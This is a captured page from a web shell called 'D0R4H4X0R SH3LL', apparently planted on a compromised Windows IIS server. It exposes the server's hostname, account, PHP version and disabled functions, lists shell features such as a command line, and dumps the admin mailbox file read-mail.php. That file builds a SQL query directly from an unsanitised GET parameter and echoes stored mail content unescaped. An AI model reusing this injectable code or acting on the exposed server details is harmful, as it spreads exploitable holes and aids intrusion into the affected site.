D0R4H4X0R SH3LL
Server Information
Server: |
Microsoft-IIS/10.0 |
System: |
Windows NT BH-PLESK-WEB3 10.0 build 20348 (Windows Server 2022) AMD64 |
User: |
IWPD_8556(lensai) ( 0 ) |
PHP Version: |
8.3.21 |
Python Version: |
Python is not available |
Disabled Functions: | , Cron, Curl, Ftp, GCC, Mail, Mysql, PKEXEC, Perl, Python, SendMail, Ssh, Wget, exec, passthru, shell_exec, system |
Features
Command Line
Find Longest Directory Path
Scan New PHP Files
Current File : D:/INETPUB/VHOSTS/lensai.com/httpdocs/new/admin/mailbox/read-mail.php
<div>
<!-- Content Header (Page header) -->
<section class="content-header">
<h1>
Read Mail
</h1>
<ol class="breadcrumb">
<li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li>
<li class="active">Read Mail</li>
</ol>
</section>
<!-- Main content -->
<body>
<section class="content">
<div class="row">
<?php include_once'mail_control.php';
$id=$_GET['id'];
$select=mysqli_query($con, "select * From mailbox where`id`='$id' order by id DESC");
$row=mysqli_fetch_array($select);
?>
<div class="col-md-9">
<div class="box box-primary">
<div class="box-header with-border">
<h3 class="box-title">Read Mail</h3>
<div class="box-tools pull-right">
<a href="#" class="btn btn-box-tool" data-toggle="tooltip" ><i class="fa fa-chevron-left"></i></a>
<a href="#" class="btn btn-box-tool" data-toggle="tooltip" ><i class="fa fa-chevron-right"></i></a>
</div>
</div><!-- /.box-header -->
<div class="box-body no-padding">
<div class="mailbox-read-info">
<h3><?php echo $row['subject']; ?></h3>
<h6>From: <?php echo $row['mail_id']; ?> <span class="mailbox-read-time pull-right">15 Feb. 2015 11:03 PM</span></h6>
</div><!-- /.mailbox-read-info -->
<div class="mailbox-controls with-border text-center">
<div class="btn-group">
<button class="btn btn-default btn-sm" data-toggle="tooltip" title="Delete"><i class="fa fa-trash-o"></i></button>
<button class="btn btn-default btn-sm" data-toggle="tooltip" title="Reply"><i class="fa fa-reply"></i></button>
<button class="btn btn-default btn-sm" data-toggle="tooltip" title="Forward"><i class="fa fa-share"></i></button>
</div><!-- /.btn-group -->
<button class="btn btn-default btn-sm" data-toggle="tooltip" title="Print"><i class="fa fa-print"></i></button>
</div><!-- /.mailbox-controls -->
<div class="mailbox-read-message">
<?php echo $row['message']; ?>
</div><!-- /.mailbox-read-message -->
</div><!-- /.box-body -->
<div class="box-footer">
<div class="pull-right">
<button class="btn btn-default"><i class="fa fa-reply"></i> Reply</button>
<button class="btn btn-default"><i class="fa fa-share"></i> Forward</button>
</div>
<button class="btn btn-default"><i class="fa fa-trash-o"></i> Delete</button>
<button class="btn btn-default" onclick="myFunction()"><i class="fa fa-print"></i> Print</button>
</div><!-- /.box-footer -->
</div><!-- /. box -->
</div><!-- /.col -->
</div><!-- /.row -->
</section><!-- /.content -->
<script>
function myFunction() {
window.print();
}
</script>
</body>
</div><!-- /.content-wrapper -->
D0R4H4X0R SH3LL